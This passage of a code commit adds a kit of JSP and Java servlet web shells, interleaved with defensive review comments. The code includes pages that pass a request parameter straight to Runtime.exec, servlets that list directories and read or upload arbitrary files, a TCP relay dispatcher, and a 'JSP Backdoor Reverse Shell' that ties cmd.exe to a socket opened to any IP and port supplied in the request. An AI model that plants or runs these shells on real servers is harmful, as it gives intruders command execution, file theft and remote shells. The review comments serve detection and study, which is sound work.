}else if(action.equals("send")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
tc.send(cmd+"\r");
if(!myShell.equals("logout"))
out.print(tc.wait(myShell));
tc.disconnect();
}else if(action.equals("close")){
try{
Socket s = new Socket("127.0.0.1",Integer.parseInt(myPort));
DataOutputStream dos = new DataOutputStream(s.getOutputStream());
PrintStream ps = new PrintStream(dos);
ps.println("--GoodBye--");
ps.close();
dos.close();
s.close();
}catch(Exception e){}
}else{
out.print("<Font color=black size=7>You Love Hacker Too?");
}
%>
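Review bot: The dispatcher at the end of this JSP acts on raw request parameters with no authentication or allow-list: `action=shell` passes `cmd` straight to `Runtime.getRuntime().exec(cmd)`, and `piped`/`tunnel` open sockets to whatever `remoteHost`/`remotePort` the request names, so anyone who can reach the page gets command execution and a TCP relay into the internal network. The same request-parameter-to-`exec` pattern is in the CmdServlet.java, cmd.jsp and cmdjsp.jsp sections of this commit. As this is being added as a sample, it should carry a leading marker such as `<%-- MALWARE SAMPLE: unauthenticated command execution and TCP relay; never deploy under a web root --%>`. For responders, `redirector1.run()` calls `System.exit(1)` on a `--GoodBye--` message, so (absent a security manager) an unexplained application-server exit alongside a listener on an unusual port is consistent with this file having been used.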

Binary file not shown.


@ -0,0 +1,43 @@
/*
* CmdServlet.java 20/01/2004
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class CmdServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
out.print("<input type=\"text\" name=\"cmd\">");
out.print("<input type=\"submit\" value=\"Send\">");
out.print("</form>");
if(req.getParameter("cmd") != null) {
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
DataInputStream procIn = new DataInputStream(p.getInputStream());
int c='\0';
while ((c=procIn.read()) != -1) {
out.print((char)c);
}
}
out.print("\n<hr></pre>");
out.print("</body></html>");
}
public String getServletInfo() {
return "CmdServlet 0.1";
}
}

Binary file not shown.


@ -0,0 +1,86 @@
/*
* ListServlet.java
*
* @author Sierra
* @version 0.1
*/
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ListServlet extends HttpServlet
{
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
PrintWriter printwriter = res.getWriter();
String path = req.getParameter("file");
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
if(req.getParameter("file")==null) path = "c:\\";
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
File file = new File(path);
if(file.isDirectory())
{
String s = new String("Unknown");
String s2 = new String("Black");
File afile[] = file.listFiles();
for(int i = 0; i < afile.length; i++)
{
String s1 = new String(afile[i].toString());
printwriter.write("(");
String s3;
if(afile[i].isDirectory())
{
printwriter.write("d");
s1 = s1 + "/";
s3 = new String("Blue");
} else
if(afile[i].isFile())
{
printwriter.write("-");
s3 = new String("Green");
} else
{
printwriter.write("?");
s3 = new String("Red");
}
if(afile[i].canRead())
printwriter.write("r");
else
printwriter.write("-");
if(afile[i].canWrite())
printwriter.write("w");
else
printwriter.write("-");
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
}
printwriter.write("<hr></FONT></BODY></HTML>");
} else
if(file.canRead())
{
FileInputStream fileinputstream = new FileInputStream(file);
int j = 0;
while(j >= 0)
{
j = fileinputstream.read();
printwriter.write(j);
}
fileinputstream.close();
} else
{
printwriter.write("Can't Read file<BR>");
}
}
public String getServletInfo() {
return "Directory Listing";
}
}
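Review bot: `doGet` builds `new File(path)` directly from the `file` request parameter, with no authentication and no confinement to a base directory, so the servlet lists any directory and streams back any file the container account can read. It also writes `path` and each file name into the HTML unescaped. Nothing here should be patched for deployment; the sample should instead say what it is, e.g. a class comment `// MALWARE SAMPLE: unauthenticated directory listing and arbitrary file read via ?file=`. For detection, access-log entries for a servlet taking `?file=` with absolute paths are the visible trace, and running the container under an account with minimal filesystem read rights limits what it can expose.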

Binary file not shown.


@ -0,0 +1,71 @@
/*
* UpServlet.java 29/04/2005
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class UpServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
out.print("<input type=\"submit\" value=\"Upload\">");
out.print("</form>");
out.print("</body></html>");
}
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
String tag = new String();
int c = '\0';
int contador = 0;
ServletInputStream in = req.getInputStream();
DataInputStream post = new DataInputStream(in);
PrintWriter out = res.getWriter();
res.setContentType("text/html");
out.print("<pre>");
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
tag=tag.concat("" + (char)c);
contador++;
}
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
// (!) Uploaded File Name
File newfile = new File("c:\\install.log");
/////////////////////////
FileOutputStream fileout = new FileOutputStream(newfile);
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
c=post.read();
fileout.write((char)c);
}
fileout.close();
out.print("<== OK");
}
public String getServletInfo() {
return "UpServlet 0.1";
}
}
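Review bot: `doPost` copies the multipart request body to the hard-coded path `c:\install.log` with no authentication, size limit or content check, so any client that can reach the servlet can overwrite that file with arbitrary bytes. For a sample collection the useful addition is documentation: a comment above `new File("c:\\install.log")` such as `// MALWARE SAMPLE: unauthenticated file drop; the hard-coded target path is a host indicator`. Writes to that path by the application-server process are worth a file-integrity alert.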

File diff suppressed because it is too large Load diff

35
jsp/hackk8/jsp_77/cmd.jsp Normal file
View file

@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
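Review bot: The `cmd` request parameter goes straight into `Runtime.getRuntime().exec(...)` with no authentication, allow-list or audit logging, so anyone who can reach this page runs OS commands as the servlet container's account; the two later sections that build `"cmd.exe /C " + cmd` and `"cmd.exe /c " + request.getParameter("cmd")` have the same property. These are web shell samples rather than application code, so each file should open with a marker such as `<%-- SAMPLE: command-execution web shell, kept for detection testing; never deploy --%>` so it cannot be mistaken for a utility page. For defenders the durable signature is a JSP in which `request.getParameter` feeds `Runtime.exec`, together with the container's Java process spawning a shell; this form uses GET, so the `cmd` value would also be visible in access logs. The value is echoed back through `out.println` unescaped, which is a separate reflected-markup issue.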


@ -0,0 +1,32 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->


@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->
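Review bot: The scriptlet opens a `Socket` to whatever `ipaddress` and `port` the request supplies and attaches a `cmd.exe` process to it through the two `StreamConnector` threads, with no authentication and no restriction on the destination. An application server rarely needs to start outbound connections to arbitrary hosts, so default-deny egress from the app tier and alerting on the container's Java process launching `cmd.exe` are the controls that contain this pattern. As rendered here the section is not valid JSP (`% >` closing the page directive, and `catch (Exception ioe)` / `catch(Exception e)` with no block), which looks like lines lost when the page was extracted rather than a property of the file. A first-line marker such as `<%-- SAMPLE: reverse-shell JSP, kept for detection testing; never deploy --%>` would make the file's purpose explicit.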


@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>
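Review bot: `new File(request.getParameter("file"))` is used exactly as supplied, so the page lists any directory and streams any file the container account can read; nothing confines the path to a base directory and nothing authenticates the caller. A legitimate file viewer would canonicalise the path and reject anything outside a fixed root, for example `if (!f.getCanonicalPath().startsWith(BASE_DIR + File.separator)) { response.sendError(403); return; }`, where `BASE_DIR` is a canonical root the page would have to define. The listing loop also writes `fname` into the `HRef` attribute and the link text unescaped, so a crafted file name becomes markup in the response. Requests carrying absolute paths or `..` sequences in a `file` parameter to a JSP are a reasonable thing to alert on.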

162
jsp/hackk8/jsp_77/up.jsp Normal file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "/tmp/";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>
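Review bot: The scriptlet writes the request body to `DPATH+filename` for any caller, with the name taken from the client's `filename=` field and no check on type, extension or an existing file of the same name; the win32 `up.jsp` section further down is the same code with `DPATH = "c:\\"`. `getFileName` does strip directory components, so the write appears to stay inside `DPATH`, but the size limit is computed from the client-sent `content-length` header minus `ROUGHSIZE`, so it is only as trustworthy as that header, and the tail of the body is buffered whole in `baos`. Defensively, the container account should not be able to write to directories it serves or executes from, and new files appearing under `/tmp/` or the drive root right after a multipart POST to a JSP are worth alerting on. A header marker such as `<%-- SAMPLE: unauthenticated upload JSP, kept for detection testing; never deploy --%>` would document the file's intent.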


@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>


@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "c:\\";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>